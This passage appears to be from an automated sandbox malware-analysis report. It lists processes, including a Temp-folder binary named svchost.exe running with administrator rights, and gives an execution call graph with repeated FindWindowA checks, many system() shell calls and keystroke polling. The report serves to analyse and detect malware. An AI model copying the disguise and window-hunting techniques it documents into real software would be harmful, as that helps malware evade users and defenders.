                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:21
                                                                                                                Start time:16:39:30
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                Imagebase:0x7ff6ed2b0000
                                                                                                                File size:468'120 bytes
                                                                                                                MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:22
                                                                                                                Start time:16:39:30
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:23
                                                                                                                Start time:16:40:01
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0xe30000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:25
                                                                                                                Start time:16:41:00
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0xd70000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:27
                                                                                                                Start time:16:42:00
                                                                                                                Start date:23/11/2024
                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Users\user~1\AppData\Local\Temp\svchost.exe
                                                                                                                Imagebase:0x7ff644d60000
                                                                                                                File size:79'872 bytes
                                                                                                                MD5 hash:9D9D23A73F3B3F53E8581D8BB31953C4
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.4%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:48.4%
                                                                                                                  Total number of Nodes:541
                                                                                                                  Total number of Limit Nodes:4
                                                                                                                  execution_graph 2873 7ff77c91ea38 2874 7ff77c91ea46 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2873->2874 2875 7ff77c91ea80 2874->2875 2876 7ff77c91ea76 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 2874->2876 2876->2875 2484 7ff77c91f700 2489 7ff77c91be50 2484->2489 2490 7ff77c91be77 2489->2490 2491 7ff77c91bea2 _Cnd_do_broadcast_at_thread_exit 2490->2491 2492 7ff77c91bfa3 2490->2492 2494 7ff77c91bec1 2490->2494 2514 7ff77c92050c 2491->2514 2548 7ff77c911e00 ?_Xlength_error@std@@YAXPEBD 2492->2548 2494->2491 2495 7ff77c91bfa8 2494->2495 2496 7ff77c91bf4b 2494->2496 2499 7ff77c91befd 2494->2499 2517 7ff77c911d60 2495->2517 2498 7ff77c9201c0 3 API calls 2496->2498 2498->2491 2539 7ff77c9201c0 2499->2539 2503 7ff77c91bf44 _invalid_parameter_noinfo_noreturn 2503->2496 2504 7ff77c91be50 26 API calls 2505 7ff77c91bfea SetConsoleTitleW 2504->2505 2531 7ff77c91ead0 2505->2531 2507 7ff77c91c09e _invalid_parameter_noinfo_noreturn 2510 7ff77c91c0a5 _invalid_parameter_noinfo_noreturn 2507->2510 2508 7ff77c92050c free 2509 7ff77c91bfae 2508->2509 2509->2504 2509->2507 2509->2508 2509->2510 2520 7ff77c91bc80 2509->2520 2511 7ff77c91c0b4 GetAsyncKeyState 2510->2511 2511->2511 2512 7ff77c91c0c0 2511->2512 2512->2511 2549 7ff77c9132e0 2512->2549 2515 7ff77c920e70 free 2514->2515 2518 7ff77c911d6e Concurrency::cancel_current_task 2517->2518 2519 7ff77c911d7f __std_exception_copy 2518->2519 2519->2509 2521 7ff77c91bc9a 2520->2521 2522 7ff77c9201c0 3 API calls 2521->2522 2523 7ff77c91bccf ?_Random_device@std@ 2522->2523 2524 7ff77c91bd70 2523->2524 2526 7ff77c91be14 2524->2526 2563 7ff77c91edb0 2524->2563 2527 7ff77c92050c free 2526->2527 2528 7ff77c91be21 2527->2528 2554 7ff77c9201a0 2528->2554 2589 7ff77c9120e0 _Query_perf_frequency _Query_perf_counter 2531->2589 2533 7ff77c91eb40 _Query_perf_frequency _Query_perf_counter 2534 7ff77c91eaef 2533->2534 2534->2533 2535 7ff77c91ec21 2534->2535 2536 7ff77c91ebe2 Sleep 2534->2536 2537 7ff77c91ebf3 Sleep SleepEx 2534->2537 2535->2509 2536->2533 2537->2535 2540 7ff77c9201da malloc 2539->2540 2541 7ff77c9201cb 2540->2541 2542 7ff77c91bf05 2540->2542 2541->2540 2543 7ff77c9201ea 2541->2543 2542->2491 2542->2503 2544 7ff77c9201f5 2543->2544 2591 7ff77c920950 2543->2591 2546 7ff77c911d60 Concurrency::cancel_current_task __std_exception_copy 2544->2546 2547 7ff77c9201fb 2546->2547 2550 7ff77c913332 2549->2550 2550->2550 2551 7ff77c913493 system 2550->2551 2552 7ff77c9134e3 2551->2552 2552->2552 2553 7ff77c91363c system 2552->2553 2553->2512 2555 7ff77c9201a9 2554->2555 2556 7ff77c91be34 2555->2556 2557 7ff77c9207e8 IsProcessorFeaturePresent 2555->2557 2556->2509 2558 7ff77c920800 2557->2558 2583 7ff77c9208bc RtlCaptureContext 2558->2583 2564 7ff77c91ef05 2563->2564 2566 7ff77c91eddf 2563->2566 2588 7ff77c911e00 ?_Xlength_error@std@@YAXPEBD 2564->2588 2569 7ff77c91ee37 2566->2569 2570 7ff77c91ee6f 2566->2570 2571 7ff77c91ee2a 2566->2571 2573 7ff77c91ee44 2566->2573 2567 7ff77c9201c0 3 API calls 2567->2571 2568 7ff77c91ef0a 2572 7ff77c911d60 Concurrency::cancel_current_task __std_exception_copy 2568->2572 2569->2568 2569->2573 2575 7ff77c9201c0 3 API calls 2570->2575 2574 7ff77c91eece _invalid_parameter_noinfo_noreturn 2571->2574 2577 7ff77c91ee8b memcpy 2571->2577 2578 7ff77c91eed5 memcpy 2571->2578 2576 7ff77c91ef10 2572->2576 2573->2567 2574->2578 2575->2571 2580 7ff77c91eeac 2577->2580 2581 7ff77c91eec1 2577->2581 2579 7ff77c91eecc 2578->2579 2579->2524 2580->2574 2580->2581 2582 7ff77c92050c free 2581->2582 2582->2579 2584 7ff77c9208d6 RtlLookupFunctionEntry 2583->2584 2585 7ff77c9208ec RtlVirtualUnwind 2584->2585 2586 7ff77c920813 2584->2586 2585->2584 2585->2586 2587 7ff77c9207b4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2586->2587 2590 7ff77c912108 2589->2590 2590->2534 2594 7ff77c920930 2591->2594 2593 7ff77c92095e _CxxThrowException 2594->2593 2877 7ff77c920540 2878 7ff77c920550 2877->2878 2890 7ff77c920344 2878->2890 2880 7ff77c920c5c 9 API calls 2881 7ff77c9205f5 2880->2881 2882 7ff77c920574 _RTC_Initialize 2887 7ff77c9205d7 2882->2887 2898 7ff77c920f2c InitializeSListHead 2882->2898 2887->2880 2889 7ff77c9205e5 2887->2889 2891 7ff77c920355 2890->2891 2895 7ff77c920387 2890->2895 2892 7ff77c9203c4 2891->2892 2896 7ff77c92035a __scrt_acquire_startup_lock 2891->2896 2893 7ff77c920c5c 9 API calls 2892->2893 2894 7ff77c9203ce 2893->2894 2895->2882 2896->2895 2897 7ff77c920377 _initialize_onexit_table 2896->2897 2897->2895 2899 7ff77c91bc40 2900 7ff77c91bc44 GetAsyncKeyState 2899->2900 2900->2900 2901 7ff77c91bc50 2900->2901 2901->2900 2903 7ff77c919a10 2901->2903 2904 7ff77c919ac3 FindWindowA 2903->2904 2906 7ff77c919c11 2904->2906 2907 7ff77c919c16 FindWindowA 2904->2907 2990 7ff77c914350 2906->2990 2910 7ff77c919db1 2907->2910 2911 7ff77c919db6 FindWindowA 2907->2911 2912 7ff77c914350 7 API calls 2910->2912 2914 7ff77c919f81 2911->2914 2915 7ff77c919f86 FindWindowA 2911->2915 2912->2911 2916 7ff77c914350 7 API calls 2914->2916 2918 7ff77c91a111 2915->2918 2919 7ff77c91a116 FindWindowA 2915->2919 2916->2915 2920 7ff77c914350 7 API calls 2918->2920 2921 7ff77c91a160 2919->2921 2922 7ff77c91a165 FindWindowA 2919->2922 2920->2919 3005 7ff77c913660 2921->3005 2924 7ff77c91a1ae 2922->2924 2925 7ff77c91a1b3 FindWindowA 2922->2925 2926 7ff77c913660 14 API calls 2924->2926 2928 7ff77c91a371 2925->2928 2929 7ff77c91a376 FindWindowA 2925->2929 2926->2925 2930 7ff77c913660 14 API calls 2928->2930 2931 7ff77c91a3b8 FindWindowA 2929->2931 2932 7ff77c91a3b3 2929->2932 2930->2929 2935 7ff77c91a5e1 2931->2935 2936 7ff77c91a5e6 FindWindowA 2931->2936 2933 7ff77c913660 14 API calls 2932->2933 2933->2931 2938 7ff77c914350 7 API calls 2935->2938 2939 7ff77c91a6b9 FindWindowA 2936->2939 2940 7ff77c91a6b4 2936->2940 2938->2936 2943 7ff77c91a8c1 2939->2943 2944 7ff77c91a8c6 FindWindowA 2939->2944 2941 7ff77c913660 14 API calls 2940->2941 2941->2939 2945 7ff77c914350 7 API calls 2943->2945 2947 7ff77c91aad1 2944->2947 2948 7ff77c91aad6 FindWindowA 2944->2948 2945->2944 2949 7ff77c914350 7 API calls 2947->2949 2951 7ff77c91ace1 2948->2951 2952 7ff77c91ace6 FindWindowA 2948->2952 2949->2948 2953 7ff77c914350 7 API calls 2951->2953 2955 7ff77c91aef1 2952->2955 2956 7ff77c91aef6 FindWindowA 2952->2956 2953->2952 2957 7ff77c914350 7 API calls 2955->2957 2959 7ff77c91b101 2956->2959 2960 7ff77c91b106 FindWindowA 2956->2960 2957->2956 2961 7ff77c914350 7 API calls 2959->2961 2963 7ff77c91b1d9 FindWindowA 2960->2963 2964 7ff77c91b1d4 2960->2964 2961->2960 2967 7ff77c91b319 FindWindowA 2963->2967 2968 7ff77c91b314 2963->2968 2965 7ff77c913660 14 API calls 2964->2965 2965->2963 2971 7ff77c91b4d1 2967->2971 2972 7ff77c91b4d6 FindWindowA 2967->2972 2969 7ff77c913660 14 API calls 2968->2969 2969->2967 2973 7ff77c913660 14 API calls 2971->2973 2975 7ff77c91b6f1 2972->2975 2976 7ff77c91b6f6 FindWindowA 2972->2976 2973->2972 2977 7ff77c913660 14 API calls 2975->2977 2979 7ff77c91b8b1 2976->2979 2980 7ff77c91b8b6 FindWindowA 2976->2980 2977->2976 2981 7ff77c913660 14 API calls 2979->2981 2983 7ff77c91bac1 2980->2983 2984 7ff77c91bac6 FindWindowA 2980->2984 2981->2980 2985 7ff77c913660 14 API calls 2983->2985 2987 7ff77c91bbf0 2984->2987 2988 7ff77c91bbf5 2984->2988 2985->2984 2989 7ff77c914350 7 API calls 2987->2989 2988->2901 2989->2988 2991 7ff77c9143e0 2990->2991 2991->2991 2992 7ff77c914513 system 2991->2992 2993 7ff77c914552 system 2992->2993 2995 7ff77c9146c7 2993->2995 2995->2995 2996 7ff77c914803 system 2995->2996 2997 7ff77c914850 system 2996->2997 2999 7ff77c9149c5 system 2997->2999 3001 7ff77c914b57 2999->3001 3001->3001 3002 7ff77c914ca0 system 3001->3002 3003 7ff77c914cea system 3002->3003 3003->2907 3006 7ff77c9136f7 3005->3006 3006->3006 3007 7ff77c913840 system 3006->3007 3008 7ff77c913879 3007->3008 3008->3008 3009 7ff77c9139b3 system 3008->3009 3010 7ff77c9139f2 system 3009->3010 3012 7ff77c913b67 3010->3012 3012->3012 3013 7ff77c913ca3 system 3012->3013 3014 7ff77c913cf0 system 3013->3014 3016 7ff77c913e65 system 3014->3016 3018 7ff77c913ff7 3016->3018 3018->3018 3019 7ff77c914140 system 3018->3019 3020 7ff77c91418a 7 API calls 3019->3020 3059 7ff77c91f080 ?uncaught_exception@std@ 3060 7ff77c91f09d 3059->3060 3061 7ff77c91f093 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 3059->3061 3061->3060 2778 7ff77c9121c0 2779 7ff77c9121ca terminate 2778->2779 2780 7ff77c9121d1 2778->2780 2779->2780 2781 7ff77c911dc0 __std_exception_copy 2782 7ff77c911cc0 __std_exception_destroy 2783 7ff77c911ce8 2782->2783 2784 7ff77c911cf5 2782->2784 2785 7ff77c92050c free 2783->2785 2785->2784 2797 7ff77c911000 2798 7ff77c9201c0 3 API calls 2797->2798 2799 7ff77c9116d8 2798->2799 2802 7ff77c91e7b0 2799->2802 2801 7ff77c911705 2803 7ff77c91e8ad 2802->2803 2804 7ff77c91e7e3 2802->2804 2803->2801 2804->2803 2806 7ff77c91e8cb 2804->2806 2807 7ff77c9201c0 3 API calls 2804->2807 2811 7ff77c91f9e0 2804->2811 2831 7ff77c91e690 2804->2831 2855 7ff77c911e20 ?_Xlength_error@std@@YAXPEBD 2806->2855 2807->2804 2812 7ff77c91fa85 2811->2812 2818 7ff77c91fa0d 2811->2818 2813 7ff77c91fa8f memcmp 2812->2813 2814 7ff77c91faf4 memcmp 2812->2814 2828 7ff77c91fa52 2813->2828 2819 7ff77c91fb2a 2814->2819 2817 7ff77c91fa37 memcmp 2817->2828 2818->2817 2827 7ff77c91fa58 2818->2827 2820 7ff77c91fb2c memcmp 2819->2820 2825 7ff77c91fb90 memcmp 2819->2825 2829 7ff77c91fb5d 2820->2829 2822 7ff77c91fd8e 2823 7ff77c91fdb5 memcmp 2822->2823 2822->2827 2823->2827 2825->2828 2826 7ff77c91fd61 memcmp 2826->2828 2827->2804 2828->2822 2828->2826 2828->2827 2829->2827 2830 7ff77c91fce1 memcmp 2829->2830 2830->2828 2832 7ff77c91e6b9 2831->2832 2833 7ff77c91e796 2832->2833 2842 7ff77c91e6d3 2832->2842 2856 7ff77c911e00 ?_Xlength_error@std@@YAXPEBD 2833->2856 2834 7ff77c91e6d9 2834->2804 2836 7ff77c91e79b 2839 7ff77c911d60 Concurrency::cancel_current_task __std_exception_copy 2836->2839 2837 7ff77c91e708 2840 7ff77c9201c0 3 API calls 2837->2840 2838 7ff77c91e76c memcpy 2838->2804 2852 7ff77c91e7a1 2839->2852 2843 7ff77c91e71e 2840->2843 2841 7ff77c91e767 2844 7ff77c9201c0 3 API calls 2841->2844 2842->2834 2842->2836 2842->2837 2842->2838 2842->2841 2845 7ff77c91e760 _invalid_parameter_noinfo_noreturn 2843->2845 2846 7ff77c91e726 2843->2846 2844->2838 2845->2841 2846->2838 2847 7ff77c91e8ad 2847->2804 2848 7ff77c91f9e0 8 API calls 2848->2852 2849 7ff77c91e8cb 2857 7ff77c911e20 ?_Xlength_error@std@@YAXPEBD 2849->2857 2850 7ff77c9201c0 3 API calls 2850->2852 2852->2847 2852->2848 2852->2849 2852->2850 2854 7ff77c91e690 13 API calls 2852->2854 2854->2852 3022 7ff77c911740 3023 7ff77c9201c0 3 API calls 3022->3023 3024 7ff77c911b25 3023->3024 3025 7ff77c911c55 3024->3025 3027 7ff77c9201c0 3 API calls 3024->3027 3029 7ff77c911c08 3024->3029 3030 7ff77c91e690 15 API calls 3024->3030 3031 7ff77c911e20 ?_Xlength_error@std@@YAXPEBD 3025->3031 3027->3024 3030->3024 3062 7ff77c921f7f 3063 7ff77c921fa8 3062->3063 3064 7ff77c921fb4 __current_exception __current_exception_context terminate 3062->3064 3064->3063 2786 7ff77c9210c8 2787 7ff77c921100 __GSHandlerCheckCommon 2786->2787 2788 7ff77c92112c 2787->2788 2789 7ff77c92111b __CxxFrameHandler4 2787->2789 2789->2788 2858 7ff77c920608 2862 7ff77c920e04 SetUnhandledExceptionFilter 2858->2862 3032 7ff77c92174c 3033 7ff77c92176c 3032->3033 3034 7ff77c92175f 3032->3034 3036 7ff77c911e40 3034->3036 3037 7ff77c911e7f 3036->3037 3038 7ff77c911e53 3036->3038 3037->3033 3039 7ff77c911e77 3038->3039 3040 7ff77c911e98 _invalid_parameter_noinfo_noreturn 3038->3040 3041 7ff77c92050c free 3039->3041 3042 7ff77c911ee0 3040->3042 3043 7ff77c911eb3 3040->3043 3041->3037 3042->3033 3044 7ff77c911ed8 3043->3044 3045 7ff77c911efa _invalid_parameter_noinfo_noreturn 3043->3045 3046 7ff77c92050c free 3044->3046 3046->3042 2863 7ff77c911d10 __std_exception_destroy 3047 7ff77c920752 3052 7ff77c920db0 GetModuleHandleW 3047->3052 3050 7ff77c920798 _exit 3051 7ff77c92075d 3053 7ff77c920759 3052->3053 3053->3050 3053->3051 2864 7ff77c920e14 2865 7ff77c920e48 2864->2865 2866 7ff77c920e2c 2864->2866 2866->2865 2867 7ff77c9210c0 free 2866->2867 2868 7ff77c920514 2869 7ff77c92052c 2868->2869 2870 7ff77c920536 2868->2870 2871 7ff77c92050c free 2869->2871 2871->2870 3065 7ff77c921e58 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N 2790 7ff77c9207a0 2793 7ff77c920e78 2790->2793 2794 7ff77c920e9b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 2793->2794 2795 7ff77c9207a9 2793->2795 2794->2795 3066 7ff77c91bc60 3067 7ff77c91bc64 GetAsyncKeyState 3066->3067 3067->3067 3068 7ff77c91bc70 3067->3068 3068->3067 3070 7ff77c914e70 3068->3070 3071 7ff77c914f13 system 3070->3071 3073 7ff77c91509d system 3071->3073 3075 7ff77c915215 system 3073->3075 3077 7ff77c915390 system 3075->3077 3079 7ff77c915505 system 3077->3079 3081 7ff77c915675 system 3079->3081 3083 7ff77c9157e7 3081->3083 3083->3083 3084 7ff77c915930 system 3083->3084 3085 7ff77c915992 system 3084->3085 3087 7ff77c915b12 3085->3087 3087->3087 3088 7ff77c915c53 system 3087->3088 3089 7ff77c915c9f system 3088->3089 3091 7ff77c915e2c 3089->3091 3091->3091 3092 7ff77c915f70 system 3091->3092 3093 7ff77c915fbd system 3092->3093 3095 7ff77c916137 3093->3095 3095->3095 3096 7ff77c916280 system 3095->3096 3097 7ff77c9162e2 system 3096->3097 3099 7ff77c916462 3097->3099 3099->3099 3100 7ff77c9165a3 system 3099->3100 3101 7ff77c9165ef system 3100->3101 3103 7ff77c91677f system 3101->3103 3105 7ff77c91690f system 3103->3105 3107 7ff77c916aa9 3105->3107 3107->3107 3108 7ff77c916bf0 system 3107->3108 3109 7ff77c916c49 3108->3109 3109->3109 3110 7ff77c916d90 system 3109->3110 3111 7ff77c916de9 3110->3111 3111->3111 3112 7ff77c916f30 system 3111->3112 3113 7ff77c916f89 3112->3113 3113->3113 3114 7ff77c9170d0 system 3113->3114 3115 7ff77c917132 system 3114->3115 3117 7ff77c9172c5 system 3115->3117 3119 7ff77c917442 3117->3119 3119->3119 3120 7ff77c917583 system 3119->3120 3121 7ff77c9175cf system 3120->3121 3123 7ff77c917747 3121->3123 3123->3123 3124 7ff77c917890 system 3123->3124 3125 7ff77c9178cf system 3124->3125 3127 7ff77c917a47 3125->3127 3127->3127 3128 7ff77c917b90 system 3127->3128 3129 7ff77c917bc7 3128->3129 3129->3129 3130 7ff77c917d10 system 3129->3130 3131 7ff77c917d47 3130->3131 3131->3131 3132 7ff77c917e90 system 3131->3132 3133 7ff77c917ec7 3132->3133 3134 7ff77c918010 system 3132->3134 3133->3134 3135 7ff77c91805c 3134->3135 3135->3135 3136 7ff77c9181a0 system 3135->3136 3137 7ff77c9181ed system 3136->3137 3139 7ff77c918367 3137->3139 3139->3139 3140 7ff77c9184b0 system 3139->3140 3141 7ff77c918512 system 3140->3141 3143 7ff77c918692 3141->3143 3143->3143 3144 7ff77c9187d3 system 3143->3144 3145 7ff77c91881f system 3144->3145 3147 7ff77c9189af system 3145->3147 3149 7ff77c918b3f system 3147->3149 3151 7ff77c918cd9 3149->3151 3151->3151 3152 7ff77c918e20 system 3151->3152 3153 7ff77c918e79 3152->3153 3153->3153 3154 7ff77c918fc0 system 3153->3154 3155 7ff77c919015 system 3154->3155 3157 7ff77c91919d system 3155->3157 3159 7ff77c91932e 3157->3159 3159->3159 3160 7ff77c919470 system 3159->3160 3161 7ff77c9194a7 3160->3161 3161->3161 3162 7ff77c9195e3 system 3161->3162 3163 7ff77c91961a 3162->3163 3163->3163 3164 7ff77c919760 system 3163->3164 3165 7ff77c9199cc system 3164->3165 3166 7ff77c919795 3164->3166 3165->3068 3166->3165 3167 7ff77c922060 3168 7ff77c91f220 2 API calls 3167->3168 3169 7ff77c922082 3168->3169 2595 7ff77c920624 2596 7ff77c92063d 2595->2596 2597 7ff77c92077b 2596->2597 2598 7ff77c920645 __scrt_acquire_startup_lock 2596->2598 2724 7ff77c920c5c IsProcessorFeaturePresent 2597->2724 2600 7ff77c920785 2598->2600 2605 7ff77c920663 __scrt_release_startup_lock 2598->2605 2601 7ff77c920c5c 9 API calls 2600->2601 2602 7ff77c920790 2601->2602 2604 7ff77c920798 _exit 2602->2604 2603 7ff77c920688 2605->2603 2606 7ff77c92070e _get_initial_narrow_environment __p___argv __p___argc 2605->2606 2609 7ff77c920706 _register_thread_local_exe_atexit_callback 2605->2609 2615 7ff77c91c0d0 2606->2615 2609->2606 2616 7ff77c91c1e6 7 API calls 2615->2616 2618 7ff77c91c3ab system 2616->2618 2620 7ff77c9201c0 3 API calls 2618->2620 2621 7ff77c91c4d9 _beginthreadex 2620->2621 2622 7ff77c91c528 system 2621->2622 2623 7ff77c91e437 ?_Throw_Cpp_error@std@@YAXH 2621->2623 2625 7ff77c91c6c7 _Thrd_detach 2622->2625 2626 7ff77c91e42b ?_Throw_Cpp_error@std@@YAXH 2622->2626 2625->2626 2627 7ff77c91c6e5 system 2625->2627 2626->2623 2629 7ff77c9201c0 3 API calls 2627->2629 2630 7ff77c91c7c1 2629->2630 2631 7ff77c91c85f 2630->2631 2730 7ff77c91e8e0 2630->2730 2632 7ff77c92050c free 2631->2632 2634 7ff77c91c86c 2632->2634 2636 7ff77c9201c0 3 API calls 2634->2636 2638 7ff77c91c87e 2636->2638 2637 7ff77c91ead0 7 API calls 2637->2630 2639 7ff77c91c91f 2638->2639 2642 7ff77c91e8e0 9 API calls 2638->2642 2640 7ff77c92050c free 2639->2640 2641 7ff77c91c92c CreateThread CreateThread Sleep 2640->2641 2643 7ff77c91c9ff 2641->2643 2644 7ff77c91c9c3 2641->2644 2645 7ff77c91c8fb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2642->2645 2646 7ff77c9201c0 3 API calls 2643->2646 2644->2643 2648 7ff77c91e8e0 9 API calls 2644->2648 2647 7ff77c91ead0 7 API calls 2645->2647 2649 7ff77c91ca23 2646->2649 2647->2638 2650 7ff77c91c9db ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2648->2650 2651 7ff77c91cabf 2649->2651 2655 7ff77c91e8e0 9 API calls 2649->2655 2653 7ff77c91ead0 7 API calls 2650->2653 2652 7ff77c92050c free 2651->2652 2654 7ff77c91cacc 2652->2654 2653->2644 2656 7ff77c9201c0 3 API calls 2654->2656 2657 7ff77c91ca9b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2655->2657 2659 7ff77c91caf0 2656->2659 2658 7ff77c91ead0 7 API calls 2657->2658 2658->2649 2660 7ff77c91cb7f 2659->2660 2662 7ff77c91e8e0 9 API calls 2659->2662 2661 7ff77c92050c free 2660->2661 2663 7ff77c91cb8c CreateThread 2661->2663 2664 7ff77c91cb5b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2662->2664 2665 7ff77c91cbf7 2663->2665 2666 7ff77c91ead0 7 API calls 2664->2666 2665->2665 2667 7ff77c91cd3f remove Sleep 2665->2667 2666->2659 2668 7ff77c91cd90 GetConsoleWindow ShowWindow 2667->2668 2669 7ff77c91ce62 system 2668->2669 2719 7ff77c91cdbd 2668->2719 2745 7ff77c91e570 2669->2745 2671 7ff77c91e450 _invalid_parameter_noinfo_noreturn _invalid_parameter_noinfo_noreturn free 2703 7ff77c91ce8b 2671->2703 2672 7ff77c91e8e0 9 API calls 2673 7ff77c91d02b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2672->2673 2674 7ff77c91ead0 7 API calls 2673->2674 2674->2703 2675 7ff77c91e8e0 9 API calls 2676 7ff77c91d17c ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2675->2676 2677 7ff77c91ead0 7 API calls 2676->2677 2677->2703 2678 7ff77c91e8e0 9 API calls 2679 7ff77c91d2cc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2678->2679 2681 7ff77c91ead0 7 API calls 2679->2681 2680 7ff77c91e570 7 API calls 2680->2703 2681->2703 2682 7ff77c91e8e0 9 API calls 2683 7ff77c91d590 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2682->2683 2684 7ff77c91ead0 7 API calls 2683->2684 2684->2703 2685 7ff77c91e8e0 9 API calls 2686 7ff77c91d6df ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2685->2686 2687 7ff77c91ead0 7 API calls 2686->2687 2687->2703 2688 7ff77c91e8e0 9 API calls 2689 7ff77c91d82d ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2688->2689 2690 7ff77c91ead0 7 API calls 2689->2690 2690->2703 2691 7ff77c91f0c0 31 API calls 2691->2703 2692 7ff77c91ef20 15 API calls 2692->2703 2693 7ff77c91e8e0 9 API calls 2694 7ff77c91dafc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2693->2694 2695 7ff77c91ead0 7 API calls 2694->2695 2695->2703 2696 7ff77c91e8e0 9 API calls 2697 7ff77c91dc4b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2696->2697 2698 7ff77c91ead0 7 API calls 2697->2698 2698->2703 2699 7ff77c91e8e0 9 API calls 2700 7ff77c91dd9b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2699->2700 2701 7ff77c91ead0 7 API calls 2700->2701 2701->2703 2702 7ff77c91ec40 13 API calls 2702->2703 2703->2671 2703->2672 2703->2675 2703->2678 2703->2680 2703->2682 2703->2685 2703->2688 2703->2691 2703->2692 2703->2693 2703->2696 2703->2699 2703->2702 2764 7ff77c91e450 2703->2764 2719->2668 2719->2669 2720 7ff77c92050c free 2719->2720 2721 7ff77c91e8e0 9 API calls 2719->2721 2720->2719 2722 7ff77c91e0eb ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2721->2722 2723 7ff77c91ead0 7 API calls 2722->2723 2723->2719 2725 7ff77c920c82 2724->2725 2726 7ff77c920c90 memset RtlCaptureContext RtlLookupFunctionEntry 2725->2726 2727 7ff77c920cca RtlVirtualUnwind 2726->2727 2728 7ff77c920d06 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 2726->2728 2727->2728 2729 7ff77c920d86 2728->2729 2729->2600 2731 7ff77c91e91e 2730->2731 2732 7ff77c91e925 ?good@ios_base@std@ 2730->2732 2731->2732 2733 7ff77c91e939 2732->2733 2739 7ff77c91e967 2732->2739 2737 7ff77c91e94f ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 2733->2737 2733->2739 2734 7ff77c91ea46 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 2735 7ff77c91c83b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 2734->2735 2736 7ff77c91ea76 